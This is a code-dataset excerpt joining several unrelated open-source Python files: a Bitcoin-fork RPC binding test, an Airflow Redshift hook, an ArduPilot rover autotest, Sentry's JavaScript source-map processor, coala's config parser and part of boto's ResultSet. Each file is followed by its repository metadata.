run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
run_bind_test(tmpdir, ['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
run_bind_test(tmpdir, [non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
run_allowip_test(tmpdir, [non_loopback_ip], non_loopback_ip, defaultport)
try:
run_allowip_test(tmpdir, ['1.1.1.1'], non_loopback_ip, defaultport)
assert(not 'Connection not denied by rpcallowip as expected')
except ValueError:
pass
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave halobitcoinds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing halobitcoind/halobitcoin-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
run_test(options.tmpdir)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except Exception as e:
print("Unexpected exception caught during testing: "+str(e))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
wait_halobitcoinds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
if __name__ == '__main__':
main()
| mit | 5,010,387,231,019,260,000 | 36.584416 | 110 | 0.63217 | false |
gilt/incubator-airflow | airflow/contrib/hooks/redshift_hook.py | 4 | 4303 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow.contrib.hooks.aws_hook import AwsHook
class RedshiftHook(AwsHook):
"""
Interact with AWS Redshift, using the boto3 library
"""
def get_conn(self):
return self.get_client_type('redshift')
# TODO: Wrap create_cluster_snapshot
def cluster_status(self, cluster_identifier):
"""
Return status of a cluster
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
"""
# Use describe clusters
response = self.get_conn().describe_clusters(ClusterIdentifier=cluster_identifier)
# Possibly return error if cluster does not exist
return response['Clusters'][0]['ClusterStatus'] if response['Clusters'] else None
def delete_cluster(self, cluster_identifier, skip_final_cluster_snapshot=True, final_cluster_snapshot_identifier=''):
"""
Delete a cluster and optionally create a snapshot
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
:param skip_final_cluster_snapshot: determines if a final cluster snapshot is made before shut-down
:type skip_final_cluster_snapshot: bool
:param final_cluster_snapshot_identifier: name of final cluster snapshot
:type final_cluster_snapshot_identifier: str
"""
response = self.get_conn().delete_cluster(
ClusterIdentifier = cluster_identifier,
SkipFinalClusterSnapshot = skip_final_cluster_snapshot,
FinalClusterSnapshotIdentifier = final_cluster_snapshot_identifier
)
return response['Cluster'] if response['Cluster'] else None
def describe_cluster_snapshots(self, cluster_identifier):
"""
Gets a list of snapshots for a cluster
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
"""
response = self.get_conn().describe_cluster_snapshots(
ClusterIdentifier = cluster_identifier
)
if 'Snapshots' not in response:
return None
snapshots = response['Snapshots']
snapshots = filter(lambda x: x['Status'], snapshots)
snapshots.sort(key=lambda x: x['SnapshotCreateTime'], reverse=True)
return snapshots
def restore_from_cluster_snapshot(self, cluster_identifier, snapshot_identifier):
"""
Restores a cluster from it's snapshot
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
"""
response = self.get_conn().restore_from_cluster_snapshot(
ClusterIdentifier = cluster_identifier,
SnapshotIdentifier = snapshot_identifier
)
return response['Cluster'] if response['Cluster'] else None
def create_cluster_snapshot(self, snapshot_identifier, cluster_identifier):
"""
Creates a snapshot of a cluster
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
"""
response = self.get_conn().create_cluster_snapshot(
SnapshotIdentifier=snapshot_identifier,
ClusterIdentifier=cluster_identifier,
)
return response['Snapshot'] if response['Snapshot'] else None
| apache-2.0 | -6,880,765,821,336,381,000 | 42.03 | 121 | 0.684174 | false |
dberroya/trad-arducopter | Tools/autotest/apmrover2.py | 5 | 5487 | # drive APMrover2 in SITL
import util, pexpect, sys, time, math, shutil, os
from common import *
from pymavlink import mavutil
import random
# get location of scripts
testdir=os.path.dirname(os.path.realpath(__file__))
#HOME=mavutil.location(-35.362938,149.165085,584,270)
HOME=mavutil.location(40.071374969556928,-105.22978898137808,1583.702759,246)
homeloc = None
def drive_left_circuit(mavproxy, mav):
'''drive a left circuit, 50m on a side'''
mavproxy.send('switch 6\n')
wait_mode(mav, 'MANUAL')
mavproxy.send('rc 3 2000\n')
print("Driving left circuit")
# do 4 turns
for i in range(0,4):
# hard left
print("Starting turn %u" % i)
mavproxy.send('rc 1 1000\n')
if not wait_heading(mav, 270 - (90*i), accuracy=10):
return False
mavproxy.send('rc 1 1500\n')
print("Starting leg %u" % i)
if not wait_distance(mav, 50, accuracy=7):
return False
mavproxy.send('rc 3 1500\n')
print("Circuit complete")
return True
def drive_RTL(mavproxy, mav):
'''drive to home'''
print("Driving home in RTL")
mavproxy.send('switch 3\n')
if not wait_location(mav, homeloc, accuracy=22, timeout=90):
return False
print("RTL Complete")
return True
def setup_rc(mavproxy):
'''setup RC override control'''
for chan in [1,2,3,4,5,6,7]:
mavproxy.send('rc %u 1500\n' % chan)
mavproxy.send('rc 8 1800\n')
def drive_mission(mavproxy, mav, filename):
'''drive a mission from a file'''
global homeloc
print("Driving mission %s" % filename)
mavproxy.send('wp load %s\n' % filename)
mavproxy.expect('flight plan received')
mavproxy.send('wp list\n')
mavproxy.expect('Requesting [0-9]+ waypoints')
mavproxy.send('switch 4\n') # auto mode
mavproxy.send('rc 3 1500\n')
wait_mode(mav, 'AUTO')
if not wait_waypoint(mav, 1, 4, max_dist=5):
return False
wait_mode(mav, 'HOLD')
print("Mission OK")
return True
def drive_APMrover2(viewerip=None, map=False):
'''drive APMrover2 in SIL
you can pass viewerip as an IP address to optionally send fg and
mavproxy packets too for local viewing of the mission in real time
'''
global homeloc
options = '--sitl=127.0.0.1:5501 --out=127.0.0.1:19550 --streamrate=10'
if viewerip:
options += " --out=%s:14550" % viewerip
if map:
options += ' --map --console'
sil = util.start_SIL('APMrover2', wipe=True)
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
mavproxy.expect('Received [0-9]+ parameters')
# setup test parameters
mavproxy.send('param set SYSID_THISMAV %u\n' % random.randint(100, 200))
mavproxy.send("param load %s/Rover.parm\n" % testdir)
mavproxy.expect('Loaded [0-9]+ parameters')
# restart with new parms
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
sim_cmd = util.reltopdir('Tools/autotest/pysim/sim_rover.py') + ' --rate=50 --home=%f,%f,%u,%u' % (
HOME.lat, HOME.lng, HOME.alt, HOME.heading)
runsim = pexpect.spawn(sim_cmd, logfile=sys.stdout, timeout=10)
runsim.delaybeforesend = 0
util.pexpect_autoclose(runsim)
runsim.expect('Starting at lat')
sil = util.start_SIL('APMrover2')
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
mavproxy.expect('Logging to (\S+)')
logfile = mavproxy.match.group(1)
print("LOGFILE %s" % logfile)
buildlog = util.reltopdir("../buildlogs/APMrover2-test.tlog")
print("buildlog=%s" % buildlog)
if os.path.exists(buildlog):
os.unlink(buildlog)
try:
os.link(logfile, buildlog)
except Exception:
pass
mavproxy.expect('Received [0-9]+ parameters')
util.expect_setup_callback(mavproxy, expect_callback)
expect_list_clear()
expect_list_extend([runsim, sil, mavproxy])
print("Started simulator")
# get a mavlink connection going
try:
mav = mavutil.mavlink_connection('127.0.0.1:19550', robust_parsing=True)
except Exception, msg:
print("Failed to start mavlink connection on 127.0.0.1:19550" % msg)
raise
mav.message_hooks.append(message_hook)
mav.idle_hooks.append(idle_hook)
failed = False
e = 'None'
try:
print("Waiting for a heartbeat with mavlink protocol %s" % mav.WIRE_PROTOCOL_VERSION)
mav.wait_heartbeat()
print("Setting up RC parameters")
setup_rc(mavproxy)
print("Waiting for GPS fix")
mav.wait_gps_fix()
homeloc = mav.location()
print("Home location: %s" % homeloc)
if not drive_mission(mavproxy, mav, os.path.join(testdir, "rover1.txt")):
print("Failed mission")
failed = True
# if not drive_left_circuit(mavproxy, mav):
# print("Failed left circuit")
# failed = True
# if not drive_RTL(mavproxy, mav):
# print("Failed RTL")
# failed = True
except pexpect.TIMEOUT, e:
print("Failed with timeout")
failed = True
mav.close()
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
util.pexpect_close(runsim)
if os.path.exists('APMrover2-valgrind.log'):
os.chmod('APMrover2-valgrind.log', 0644)
shutil.copy("APMrover2-valgrind.log", util.reltopdir("../buildlogs/APMrover2-valgrind.log"))
if failed:
print("FAILED: %s" % e)
return False
return True
| gpl-3.0 | -7,648,395,719,199,807,000 | 30.176136 | 103 | 0.632951 | false |
ngonzalvez/sentry | src/sentry/lang/javascript/processor.py | 4 | 21634 | from __future__ import absolute_import, print_function
__all__ = ['SourceProcessor']
import logging
import re
import base64
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from collections import namedtuple
from hashlib import md5
from os.path import splitext
from requests.exceptions import RequestException
from simplejson import JSONDecodeError
from urlparse import urlparse, urljoin, urlsplit
# In case SSL is unavailable (light builds) we can't import this here.
try:
from OpenSSL.SSL import ZeroReturnError
except ImportError:
class ZeroReturnError(Exception):
pass
from sentry import http
from sentry.interfaces.stacktrace import Stacktrace
from sentry.models import EventError, Release, ReleaseFile
from sentry.event_manager import generate_culprit
from sentry.utils.cache import cache
from sentry.utils.http import is_valid_origin
from .cache import SourceCache, SourceMapCache
from .sourcemaps import sourcemap_to_index, find_source
# number of surrounding lines (on each side) to fetch
LINES_OF_CONTEXT = 5
BASE64_SOURCEMAP_PREAMBLE = 'data:application/json;base64,'
BASE64_PREAMBLE_LENGTH = len(BASE64_SOURCEMAP_PREAMBLE)
UNKNOWN_MODULE = '<unknown module>'
CLEAN_MODULE_RE = re.compile(r"""^
(?:/| # Leading slashes
(?:
(?:java)?scripts?|js|build|static|node_modules|bower_components|[_\.].*?| # common folder prefixes
v?(?:\d+\.)*\d+| # version numbers, v1, 1.0.0
[a-f0-9]{7,8}| # short sha
[a-f0-9]{32}| # md5
[a-f0-9]{40} # sha1
)/)+|
(?:[-\.][a-f0-9]{7,}$) # Ending in a commitish
""", re.X | re.I)
VERSION_RE = re.compile(r'^[a-f0-9]{32}|[a-f0-9]{40}$', re.I)
# the maximum number of remote resources (i.e. sourc eifles) that should be
# fetched
MAX_RESOURCE_FETCHES = 100
# TODO(dcramer): we want to change these to be constants so they are easier
# to translate/link again
UrlResult = namedtuple('UrlResult', ['url', 'headers', 'body'])
logger = logging.getLogger(__name__)
class BadSource(Exception):
error_type = EventError.UNKNOWN_ERROR
def __init__(self, data=None):
if data is None:
data = {}
data.setdefault('type', self.error_type)
super(BadSource, self).__init__(data['type'])
self.data = data
class CannotFetchSource(BadSource):
error_type = EventError.JS_GENERIC_FETCH_ERROR
class UnparseableSourcemap(BadSource):
error_type = EventError.JS_INVALID_SOURCEMAP
def trim_line(line, column=0):
"""
Trims a line down to a goal of 140 characters, with a little
wiggle room to be sensible and tries to trim around the given
`column`. So it tries to extract 60 characters before and after
the provided `column` and yield a better context.
"""
line = line.strip('\n')
ll = len(line)
if ll <= 150:
return line
if column > ll:
column = ll
start = max(column - 60, 0)
# Round down if it brings us close to the edge
if start < 5:
start = 0
end = min(start + 140, ll)
# Round up to the end if it's close
if end > ll - 5:
end = ll
# If we are bumped all the way to the end,
# make sure we still get a full 140 characters in the line
if end == ll:
start = max(end - 140, 0)
line = line[start:end]
if end < ll:
# we've snipped from the end
line += ' {snip}'
if start > 0:
# we've snipped from the beginning
line = '{snip} ' + line
return line
def get_source_context(source, lineno, colno, context=LINES_OF_CONTEXT):
if not source:
return [], '', []
# lineno's in JS are 1-indexed
# just in case. sometimes math is hard
if lineno > 0:
lineno -= 1
lower_bound = max(0, lineno - context)
upper_bound = min(lineno + 1 + context, len(source))
try:
pre_context = map(trim_line, source[lower_bound:lineno])
except IndexError:
pre_context = []
try:
context_line = trim_line(source[lineno], colno)
except IndexError:
context_line = ''
try:
post_context = map(trim_line, source[(lineno + 1):upper_bound])
except IndexError:
post_context = []
return pre_context, context_line, post_context
def discover_sourcemap(result):
"""
Given a UrlResult object, attempt to discover a sourcemap.
"""
# When coercing the headers returned by urllib to a dict
# all keys become lowercase so they're normalized
sourcemap = result.headers.get('sourcemap', result.headers.get('x-sourcemap'))
if not sourcemap:
parsed_body = result.body.splitlines()
# Source maps are only going to exist at either the top or bottom of the document.
# Technically, there isn't anything indicating *where* it should exist, so we
# are generous and assume it's somewhere either in the first or last 5 lines.
# If it's somewhere else in the document, you're probably doing it wrong.
if len(parsed_body) > 10:
possibilities = parsed_body[:5] + parsed_body[-5:]
else:
possibilities = parsed_body
# We want to scan each line sequentially, and the last one found wins
# This behavior is undocumented, but matches what Chrome and Firefox do.
for line in possibilities:
if line[:21] in ('//# sourceMappingURL=', '//@ sourceMappingURL='):
# We want everything AFTER the indicator, which is 21 chars long
sourcemap = line[21:].rstrip()
if sourcemap:
# fix url so its absolute
sourcemap = urljoin(result.url, sourcemap)
return sourcemap
def fetch_release_file(filename, release):
cache_key = 'releasefile:%s:%s' % (
release.id,
md5(filename.encode('utf-8')).hexdigest(),
)
logger.debug('Checking cache for release artfiact %r (release_id=%s)',
filename, release.id)
result = cache.get(cache_key)
if result is None:
logger.debug('Checking database for release artifact %r (release_id=%s)',
filename, release.id)
ident = ReleaseFile.get_ident(filename)
try:
releasefile = ReleaseFile.objects.filter(
release=release,
ident=ident,
).select_related('file').get()
except ReleaseFile.DoesNotExist:
logger.debug('Release artifact %r not found in database (release_id=%s)',
filename, release.id)
cache.set(cache_key, -1, 60)
return None
logger.debug('Found release artifact %r (id=%s, release_id=%s)',
filename, releasefile.id, release.id)
with releasefile.file.getfile() as fp:
body = fp.read()
result = (releasefile.file.headers, body, 200)
cache.set(cache_key, result, 300)
elif result == -1:
result = None
return result
def fetch_url(url, project=None, release=None):
"""
Pull down a URL, returning a UrlResult object.
Attempts to fetch from the cache.
"""
cache_key = 'source:cache:v2:%s' % (
md5(url.encode('utf-8')).hexdigest(),
)
if release:
result = fetch_release_file(url, release)
else:
result = None
if result is None:
logger.debug('Checking cache for url %r', url)
result = cache.get(cache_key)
if result is None:
# lock down domains that are problematic
domain = urlparse(url).netloc
domain_key = 'source:blacklist:v2:%s' % (
md5(domain.encode('utf-8')).hexdigest(),
)
domain_result = cache.get(domain_key)
if domain_result:
domain_result['url'] = url
raise CannotFetchSource(domain_result)
headers = {}
if project and is_valid_origin(url, project=project):
token = project.get_option('sentry:token')
if token:
headers['X-Sentry-Token'] = token
logger.debug('Fetching %r from the internet', url)
http_session = http.build_session()
try:
response = http_session.get(
url,
allow_redirects=True,
verify=False,
headers=headers,
timeout=settings.SENTRY_SOURCE_FETCH_TIMEOUT,
)
except Exception as exc:
logger.debug('Unable to fetch %r', url, exc_info=True)
if isinstance(exc, SuspiciousOperation):
error = {
'type': EventError.SECURITY_VIOLATION,
'value': unicode(exc),
'url': url,
}
elif isinstance(exc, (RequestException, ZeroReturnError)):
error = {
'type': EventError.JS_GENERIC_FETCH_ERROR,
'value': str(type(exc)),
'url': url,
}
else:
logger.exception(unicode(exc))
error = {
'type': EventError.UNKNOWN_ERROR,
'url': url,
}
# TODO(dcramer): we want to be less aggressive on disabling domains
cache.set(domain_key, error or '', 300)
logger.warning('Disabling sources to %s for %ss', domain, 300,
exc_info=True)
raise CannotFetchSource(error)
# requests' attempts to use chardet internally when no encoding is found
# and we want to avoid that slow behavior
if not response.encoding:
response.encoding = 'utf-8'
result = (
{k.lower(): v for k, v in response.headers.items()},
response.text,
response.status_code,
)
cache.set(cache_key, result, 60)
if result[2] != 200:
logger.debug('HTTP %s when fetching %r', result[2], url,
exc_info=True)
error = {
'type': EventError.JS_INVALID_HTTP_CODE,
'value': result[2],
'url': url,
}
raise CannotFetchSource(error)
return UrlResult(url, result[0], result[1])
def fetch_sourcemap(url, project=None, release=None):
if is_data_uri(url):
body = base64.b64decode(url[BASE64_PREAMBLE_LENGTH:])
else:
result = fetch_url(url, project=project, release=release)
body = result.body
# According to various specs[1][2] a SourceMap may be prefixed to force
# a Javascript load error.
# [1] https://docs.google.com/document/d/1U1RGAehQwRypUTovF1KRlpiOFze0b-_2gc6fAH0KY0k/edit#heading=h.h7yy76c5il9v
# [2] http://www.html5rocks.com/en/tutorials/developertools/sourcemaps/#toc-xssi
if body.startswith((")]}'\n", ")]}\n")):
body = body.split('\n', 1)[1]
try:
return sourcemap_to_index(body)
except (JSONDecodeError, ValueError):
raise UnparseableSourcemap({
'url': url,
})
def is_data_uri(url):
return url[:BASE64_PREAMBLE_LENGTH] == BASE64_SOURCEMAP_PREAMBLE
def generate_module(src):
"""
Converts a url into a made-up module name by doing the following:
* Extract just the path name ignoring querystrings
* Trimming off the initial /
* Trimming off the file extension
* Removes off useless folder prefixes
e.g. http://google.com/js/v1.0/foo/bar/baz.js -> foo/bar/baz
"""
if not src:
return UNKNOWN_MODULE
filename, ext = splitext(urlsplit(src).path)
if ext not in ('.js', '.coffee'):
return UNKNOWN_MODULE
if filename.endswith('.min'):
filename = filename[:-4]
# TODO(dcramer): replace CLEAN_MODULE_RE with tokenizer completely
tokens = filename.split('/')
for idx, token in enumerate(tokens):
# a SHA
if VERSION_RE.match(token):
return '/'.join(tokens[idx + 1:])
return CLEAN_MODULE_RE.sub('', filename) or UNKNOWN_MODULE
class SourceProcessor(object):
"""
Attempts to fetch source code for javascript frames.
Frames must match the following requirements:
- lineno >= 0
- colno >= 0
- abs_path is the HTTP URI to the source
- context_line is empty
Mutates the input ``data`` with expanded context if available.
"""
def __init__(self, max_fetches=MAX_RESOURCE_FETCHES):
self.max_fetches = max_fetches
self.cache = SourceCache()
self.sourcemaps = SourceMapCache()
def get_stacktraces(self, data):
try:
stacktraces = [
e['stacktrace']
for e in data['sentry.interfaces.Exception']['values']
if e.get('stacktrace')
]
except KeyError:
stacktraces = []
if 'sentry.interfaces.Stacktrace' in data:
stacktraces.append(data['sentry.interfaces.Stacktrace'])
return [
(s, Stacktrace.to_python(s))
for s in stacktraces
]
def get_valid_frames(self, stacktraces):
# build list of frames that we can actually grab source for
frames = []
for _, stacktrace in stacktraces:
frames.extend([
f for f in stacktrace.frames
if f.lineno is not None
and f.is_url()
])
return frames
def get_release(self, project, data):
if not data.get('release'):
return
return Release.get(
project=project,
version=data['release'],
)
def process(self, project, data):
stacktraces = self.get_stacktraces(data)
if not stacktraces:
logger.debug('No stacktrace for event %r', data['event_id'])
return
frames = self.get_valid_frames(stacktraces)
if not frames:
logger.debug('Event %r has no frames with enough context to fetch remote source', data['event_id'])
return
data.setdefault('errors', [])
errors = data['errors']
release = self.get_release(project, data)
# all of these methods assume mutation on the original
# objects rather than re-creation
self.populate_source_cache(project, frames, release)
errors.extend(self.expand_frames(frames) or [])
self.ensure_module_names(frames)
self.fix_culprit(data, stacktraces)
self.update_stacktraces(stacktraces)
return data
def fix_culprit(self, data, stacktraces):
data['culprit'] = generate_culprit(data)
def update_stacktraces(self, stacktraces):
for raw, interface in stacktraces:
raw.update(interface.to_json())
def ensure_module_names(self, frames):
# TODO(dcramer): this doesn't really fit well with generic URLs so we
# whitelist it to http/https
for frame in frames:
if not frame.module and frame.abs_path.startswith(('http:', 'https:')):
frame.module = generate_module(frame.abs_path)
def expand_frames(self, frames):
last_state = None
state = None
has_changes = False
cache = self.cache
sourcemaps = self.sourcemaps
all_errors = []
for frame in frames:
errors = cache.get_errors(frame.abs_path)
if errors:
has_changes = True
all_errors.extend(errors)
source = cache.get(frame.abs_path)
if source is None:
logger.info('No source found for %s', frame.abs_path)
continue
sourcemap_url, sourcemap_idx = sourcemaps.get_link(frame.abs_path)
if sourcemap_idx and frame.colno is not None:
last_state = state
state = find_source(sourcemap_idx, frame.lineno, frame.colno)
if is_data_uri(sourcemap_url):
sourcemap_label = frame.abs_path
else:
sourcemap_label = sourcemap_url
abs_path = urljoin(sourcemap_url, state.src)
logger.debug('Mapping compressed source %r to mapping in %r', frame.abs_path, abs_path)
source = cache.get(abs_path)
if not source:
frame.data = {
'sourcemap': sourcemap_label,
}
errors = cache.get_errors(abs_path)
if errors:
all_errors.extend(errors)
else:
all_errors.append({
'type': EventError.JS_MISSING_SOURCE,
'url': abs_path.encode('utf-8'),
})
# Store original data in annotation
frame.data = {
'orig_lineno': frame.lineno,
'orig_colno': frame.colno,
'orig_function': frame.function,
'orig_abs_path': frame.abs_path,
'orig_filename': frame.filename,
'sourcemap': sourcemap_label,
}
# SourceMap's return zero-indexed lineno's
frame.lineno = state.src_line + 1
frame.colno = state.src_col
# The offending function is always the previous function in the stack
# Honestly, no idea what the bottom most frame is, so we're ignoring that atm
if last_state:
frame.function = last_state.name or frame.function
else:
frame.function = state.name or frame.function
filename = state.src
# special case webpack support
if filename.startswith('webpack://'):
abs_path = filename
# webpack seems to use ~ to imply "relative to resolver root"
# which is generally seen for third party deps
# (i.e. node_modules)
if '/~/' in filename:
filename = '~/' + abs_path.split('/~/', 1)[-1]
else:
filename = filename.split('webpack:///', 1)[-1]
frame.abs_path = abs_path
frame.filename = filename
if abs_path.startswith(('http:', 'https:')):
frame.module = generate_module(abs_path)
elif sourcemap_url:
frame.data = {
'sourcemap': sourcemap_url,
}
# TODO: theoretically a minified source could point to another mapped, minified source
frame.pre_context, frame.context_line, frame.post_context = get_source_context(
source=source, lineno=frame.lineno, colno=frame.colno or 0)
return all_errors
def populate_source_cache(self, project, frames, release):
pending_file_list = set()
done_file_list = set()
sourcemap_capable = set()
cache = self.cache
sourcemaps = self.sourcemaps
for f in frames:
pending_file_list.add(f.abs_path)
if f.colno is not None:
sourcemap_capable.add(f.abs_path)
idx = 0
while pending_file_list:
idx += 1
filename = pending_file_list.pop()
done_file_list.add(filename)
if idx > self.max_fetches:
cache.add_error(filename, {
'type': EventError.JS_TOO_MANY_REMOTE_SOURCES,
})
continue
# TODO: respect cache-control/max-age headers to some extent
logger.debug('Fetching remote source %r', filename)
try:
result = fetch_url(filename, project=project, release=release)
except BadSource as exc:
cache.add_error(filename, exc.data)
continue
cache.add(filename, result.body.splitlines())
cache.alias(result.url, filename)
sourcemap_url = discover_sourcemap(result)
if not sourcemap_url:
continue
# If we didn't have a colno, a sourcemap wont do us any good
if filename not in sourcemap_capable:
cache.add_error(filename, {
'type': EventError.JS_NO_COLUMN,
'url': filename,
})
continue
logger.debug('Found sourcemap %r for minified script %r', sourcemap_url[:256], result.url)
sourcemaps.link(filename, sourcemap_url)
if sourcemap_url in sourcemaps:
continue
# pull down sourcemap
try:
sourcemap_idx = fetch_sourcemap(
sourcemap_url,
project=project,
release=release,
)
except BadSource as exc:
cache.add_error(filename, exc.data)
continue
sourcemaps.add(sourcemap_url, sourcemap_idx)
# queue up additional source files for download
for source in sourcemap_idx.sources:
next_filename = urljoin(sourcemap_url, source)
if next_filename not in done_file_list:
if source in sourcemap_idx.content:
cache.add(next_filename, sourcemap_idx.content[source])
done_file_list.add(next_filename)
else:
pending_file_list.add(next_filename)
| bsd-3-clause | 8,830,881,345,056,043,000 | 33.015723 | 117 | 0.569705 | false |
IPMITMO/statan | coala/coalib/parsing/ConfParser.py | 24 | 6164 | import os
from collections import OrderedDict
from types import MappingProxyType
import logging
from coalib.misc import Constants
from coalib.parsing.LineParser import LineParser
from coalib.settings.Section import Section
from coalib.settings.Setting import Setting
class ConfParser:
def __init__(self,
key_value_delimiters=('=',),
comment_seperators=('#',),
key_delimiters=(',', ' '),
section_name_surroundings=MappingProxyType({'[': ']'}),
remove_empty_iter_elements=True,
key_value_append_delimiters=('+=',)):
self.line_parser = LineParser(
key_value_delimiters,
comment_seperators,
key_delimiters,
section_name_surroundings,
key_value_append_delimiters=key_value_append_delimiters)
self.__remove_empty_iter_elements = remove_empty_iter_elements
# Declare it
self.sections = None
self.__rand_helper = None
self.__init_sections()
def parse(self, input_data, overwrite=False):
"""
Parses the input and adds the new data to the existing.
:param input_data: The filename to parse from.
:param overwrite: If True, wipes all existing Settings inside this
instance and adds only the newly parsed ones. If
False, adds the newly parsed data to the existing
one (and overwrites already existing keys with the
newly parsed values).
:return: A dictionary with (lowercase) section names as keys
and their Setting objects as values.
"""
if os.path.isdir(input_data):
input_data = os.path.join(input_data, Constants.default_coafile)
with open(input_data, 'r', encoding='utf-8') as _file:
lines = _file.readlines()
if overwrite:
self.__init_sections()
self.__parse_lines(lines, input_data)
return self.sections
def get_section(self, name, create_if_not_exists=False):
key = self.__refine_key(name)
sec = self.sections.get(key, None)
if sec is not None:
return sec
if not create_if_not_exists:
raise IndexError
retval = self.sections[key] = Section(str(name))
return retval
@staticmethod
def __refine_key(key):
return str(key).lower().strip()
def __add_comment(self, section, comment, origin):
key = 'comment' + str(self.__rand_helper)
self.__rand_helper += 1
section.append(Setting(
key,
comment,
origin,
remove_empty_iter_elements=self.__remove_empty_iter_elements))
def __parse_lines(self, lines, origin):
current_section_name = 'default'
current_section = self.get_section(current_section_name)
current_keys = []
no_section = True
for line in lines:
(section_name,
keys,
value,
append,
comment) = self.line_parser._parse(line)
if comment != '':
self.__add_comment(current_section, comment, origin)
if section_name != '':
no_section = False
current_section_name = section_name
current_section = self.get_section(current_section_name, True)
current_keys = []
continue
if comment == '' and keys == [] and value == '':
self.__add_comment(current_section, '', origin)
continue
if keys != []:
current_keys = keys
for section_override, key in current_keys:
if no_section:
logging.warning('A setting does not have a section.'
'This is a deprecated feature please '
'put this setting in a section defined'
' with `[<your-section-name]` in a '
'configuration file.')
if key == '':
continue
if key in current_section.contents and keys != []:
logging.warning('{} setting has already been defined in '
'section {}. The previous setting will be '
'overridden.'.format(key,
current_section.name))
if section_override == '':
current_section.add_or_create_setting(
Setting(key,
value,
origin,
to_append=append,
# Start ignoring PEP8Bear, PycodestyleBear*
# they fail to resolve this
remove_empty_iter_elements=
self.__remove_empty_iter_elements),
# Stop ignoring
allow_appending=(keys == []))
else:
self.get_section(
section_override,
True).add_or_create_setting(
Setting(key,
value,
origin,
to_append=append,
# Start ignoring PEP8Bear, PycodestyleBear*
# they fail to resolve this
remove_empty_iter_elements=
self.__remove_empty_iter_elements),
# Stop ignoring
allow_appending=(keys == []))
def __init_sections(self):
self.sections = OrderedDict()
self.sections['default'] = Section('Default')
self.__rand_helper = 0
| mit | -7,632,719,172,983,834,000 | 37.049383 | 79 | 0.483777 | false |
nanocell/lsync | python/boto/resultset.py | 4 | 6186 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.s3.user import User
class ResultSet(list):
"""
The ResultSet is used to pass results back from the Amazon services
to the client. It is light wrapper around Python's :py:class:`list` class,
with some additional methods for parsing XML results from AWS.
Because I don't really want any dependencies on external libraries,
I'm using the standard SAX parser that comes with Python. The good news is
that it's quite fast and efficient but it makes some things rather
difficult.
You can pass in, as the marker_elem parameter, a list of tuples.
